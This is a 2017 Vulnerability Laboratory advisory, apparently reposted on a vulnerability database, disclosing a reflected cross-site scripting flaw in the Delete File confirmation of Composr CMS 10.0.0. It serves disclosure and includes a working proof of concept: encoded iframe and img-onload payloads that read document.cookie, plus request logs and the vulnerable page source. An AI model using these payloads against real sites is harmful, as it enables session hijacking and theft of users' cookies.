Composr CMS v10.0.0 - Cross Site Scripting Vulnerability

2017.06.12
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Document Title: =============== Composr CMS v10.0.0 - Cross Site Scripting Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2066 Release Date: ============= 2017-06-08 Vulnerability Laboratory ID (VL-ID): ==================================== 2066 Common Vulnerability Scoring System: ==================================== 3.3 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Composr is a CMS with many social media features, for building modern, sophisticated websites. Composr supports many types of content (galleries, news/newsletters, etc.) - and integrating rich media and advertising into them. Social features include forums, member blogs, chat rooms, wiki, and content commenting/rating. (Copy of the Homepage: https://compo.sr/start.htm ) Abstract Advisory Information: ============================== The vulnerability laboratory team discovered a non-persistent cross site vulnerability in the official Composr v10.0.0 content management system web-application. Vulnerability Disclosure Timeline: ================================== 2017-06-08: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ocProducts Ltd Product: Composr - Content Management System (Web-Application) 10.0.0 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non-persistent cross site scripting vulnerability has been discovered in the official Composr v10.0.0 content management system web-application. The vulnerability allows remote attackers to inject own malicious script codes to client-side browser to web-application requests for compromise. The vulnerability is located in the `Error Exception` of the `Delete File` function. The remote attacker is able to inject own malicious code via GET method request in the `file` parameter to provoke an execution. The injection point is the `file` parameter and the execution point occurs in the error exception that displays the content to confirm a delete. The vulnerability is a classic cross site scripting issue with non-persistent attack vector by client-side exploitation. The error message content that is redisplayed is not properly parsed. The security risk of the cross site scripting vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the client-side cross site scripting vulnerability requires no privileged web-application user account and only low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected or connected application modules. Request Method(s): [+] GET Vulnerable Module(s): [+] Delete File Parameter(s): [+] file Affected Module(s): [+] Error Exception-Handling Proof of Concept (PoC): ======================= The cross site scripting vulnerability can be exploited by remote attackers with low or medium user interaction and without privileged user accounts. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Exploit <html> <head><body> <title></title> <iframe src=http://composr.localhost:8080/ocportal/cms/index.php?page=filedump&type=ed&file= %3E%22%3Cimg%3E%20%3E%22%3Cimg%20src=%22x%22%20onload=alert(document.cookie)%20%3C31337.png&place=%2F&keep_fatalistic=1> <iframe src=http://composr.localhost:8080/ocportal/cms/index.php?page=filedump&type=ed&file= %3E%22%3Cimg%3E%20%3E%22%3Cimg%20src=%22x%22%20onload=alert(document.domain)%20%3C20%3C31337.png&place=%2F&keep_fatalistic=1> </body></head> ... ... <script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3E%3C/title%3E%0A%3Ciframe%20src %3Dhttp%3A//composr.localhost%3A8080/ocportal/cms/index.php%3Fpage%3Dfiledump%26type%3Ded%26file%3D%0A%253E %2522%253Cimg%253E%2520%253E%2522%253Cimg%2520src%3D%2522x%2522%2520onload%3Dalert%28document.cookie%29%2520 %253C31337.png%26place%3D%252F%26keep_fatalistic%3D1%3E%0A%3Ciframe%20src %3Dhttp%3A//composr.localhost%3A8080/ocportal/cms/index.php%3Fpage%3Dfiledump%26type%3Ded%26file%3D%0A%253E %2522%253Cimg%253E%2520%253E%2522%253Cimg%2520src%3D%2522x%2522%2520onload%3Dalert%28document.domain%29%2520 %253C20%253C31337.png%26place%3D%252F%26keep_fatalistic%3D1%3E%0A%3C/body%3E%3C/head%3E';d=unescape(m);document.write(d);</script> --- PoC Session Logs --- Status: 200[OK] GET http://composr.localhost:8080/ocportal/cms/index.php?page=filedump&type=ed&file=%3E%22%3Cimg%3E%20%3E%22%3Cimg%20src=%22x%22%20onload=alert(document.domain)%20%3C20%3C31337.png&place=%2F&keep_fatalistic=1 Mime Type[text/html] Request Header: Host[composr.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Cookie[has_cookies=1; ocp_session=2109631150; _pk_id.2.bb5e=6d867d24869e482f.1494351713.1.1494352902.1494351713.; _pk_ses.2.bb5e=*; last_visit=1430288544] DNT[1] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[nginx/1.2.1] Date[Tue, 09 May 2017 18:03:01 GMT] Content-Type[text/html; charset=ISO-8859-1] Transfer-Encoding[chunked] Connection[keep-alive] X-Powered-By[ocPortal] Expires[Mon, 20 Dec 1998 01:00:00 GMT] Cache-Control[no-cache, max-age=0] Pragma[no-cache] X-Frame-Options[SAMEORIGIN] Content-Encoding[gzip] - Status: 200[OK] GET http://composr.localhost:8080/ocportal/cms/evil.source Mime Type[text/html] Request Header: Host[composr.localhost:8080] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0] Accept[*/*] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://composr.localhost:8080/ocportal/cms/index.php?page=filedump&type=ed&file=%3E%22%3Cimg%3E%20%3E%22%3Cimg%20src=%22evil.source%22%20onload=alert(document.cookie)%20%3C31337.png&place=%2F&keep_fatalistic=1] Cookie[has_cookies=1; ocp_session=2109631150; _pk_id.2.bb5e=6d867d24869e482f.1494351713.1.1494352902.1494351713.; _pk_ses.2.bb5e=*; last_visit=1430288544] DNT[1] Connection[keep-alive] Response Header: Server[nginx/1.2.1] Date[Tue, 09 May 2017 18:03:01 GMT] Content-Type[text/html; charset=iso-8859-1] Transfer-Encoding[chunked] Connection[keep-alive] Content-Encoding[gzip] PoC: Vulnerable Source (Execution Point) <article class="global_middle"> <nav class="global_breadcrumbs breadcrumbs" itemprop="breadcrumb" role="navigation"> <img class="breadcrumbs_img" src="http://composr.localhost:8080/ocportal/themes/default/images/breadcrumbs.png" title="" alt="You are here"> <a title="" href="http://composr.localhost:8080/ocportal/index.php?page=start&amp;keep_fatalistic=1">Home</a><span class="sep"> <span class="accessibility_hidden"> ?</span></span> <a title="" href="http://composr.localhost:8080/ocportal/cms/index.php?page=cms&amp;keep_fatalistic=1">Content Management</a> <span class="sep"><span class="accessibility_hidden"> ?</span></span> <a title="" href="http://composr.localhost:8080/ocportal/cms/index.php?page=filedump&amp;keep_fatalistic=1">File/Media library</a> <span class="sep"><span class="accessibility_hidden"> ?</span></span> <span>Confirm</span> </nav> <a id="maincontent"></a> <h1 class="screen_title" itemprop="name" role="banner"> Delete file </h1> <p> Please confirm that you want to do the following: </p> <div class="box box___confirm_screen"><div class="box_inner"> Are you sure that you want to delete '&gt;"<img> &gt;"<img src="evil.source" onload="alert(document.cookie)" <31337.png'?="" <="" div=""></div> <form title="" method="post" action="http://composr.localhost:8080/ocportal/cms/index.php?page=filedump&amp; type=ed&amp;file=%3E%22%3Cimg%3E+%3E%22%3Cimg+src%3D%22evil.source%22+onload%3Dalert%28document.cookie%29+%3C31337.png&amp;place=%2F&amp;keep_fatalistic=1"> <div> <input name="confirmed" value="1" type="hidden"> <p class="proceed_button"> <input onclick="disable_button_just_clicked(this);" accesskey="u" class="button_page" value="Proceed" type="submit"> </p> </div> Reference(s): http://composr.localhost:8080/ http://composr.localhost:8080/ocportal/ http://composr.localhost:8080/ocportal/cms/ http://composr.localhost:8080/ocportal/cms/index.php Solution - Fix & Patch: ======================= The vulnerability can be patched by a parse of the output in the error messag for invalid content on delete interaction. This needs to be recognized during the development process in all the different delete functions. Security Risk: ============== The security risk of the client-side cross site scripting vulnerability in the web-application is estimated as medium (CVSS 3.3). Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™

References:

https://www.vulnerability-lab.com/get_content.php?id=2066


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top